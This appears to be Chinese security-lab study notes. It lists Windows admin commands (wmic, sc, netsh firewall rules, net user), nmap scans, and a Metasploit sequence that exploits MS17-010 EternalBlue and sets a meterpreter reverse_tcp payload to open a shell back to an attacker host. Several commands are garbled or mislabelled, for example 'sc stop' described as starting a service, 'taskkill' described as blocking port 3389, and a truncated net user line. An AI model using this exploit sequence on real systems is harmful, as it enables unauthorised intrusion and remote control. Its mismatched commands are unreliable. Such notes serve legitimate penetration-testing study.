格式使用:wmic [系统参数名] list [brief或full] /format:hform >或>> [文件名]
3.通过 sc 工具管理服务,启动 mysql 服务:sc stop sysql
4.通过命令行 CMD 管理 Windows 防火墙,允许 192.168.1.100 连接所有端 口:netsh netsh advfirewall firewall add rule name=ming protocol=TCP localport=8080 dir=in action=allow remoteip=192.168.1.100
5.阻断 tcp/3389 端口连接:taskkill /f /pid3386 /t
6.通过命令行 CMD 管理 Windows 用户,添加 skill 用户至 administrators 组:
net user skill skill /ad
添加一条名为3386入站规则放行3386端口的策略: netsh advfirewall firewall add rule name=3389_test dir=in action=allow protocol=TCP localport=3389
nmap扫描;
nmap 192.168.117.150 扫描开发的端口
nmap --seript=vuln 192.168.117.150 ;扫描存在的漏洞 ————永恒之蓝的漏洞是smb-vuln-ms17-010
nmap -A 192.168.117.150 扫描目标的所有信息
nmap -p 445 192.168.117.150 扫描指定端口扫描
nmap -PA 192.168.117.0 /24 扫描局域网所有IP信息
nmap -sV -v 192.168.117.150 指纹识别扫描
msfconsole
use auxiliary/scanner/smb_ms17_010 -----扫描靶机的信息
set RHOST 靶机地址
run --- 攻击
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 靶机地址
set LHOST 攻击机
set payload windows/X64/meterpreter/reverse_tcp
run
search ms17 查询漏洞编号”ms17“
"use 6"
option ---查询必须的参数
search ms17
use 8 -----使用8模块
show payloads ------显示所有载荷模块
set payload 15 ------使用15的载荷模块
options ------查询必填的内容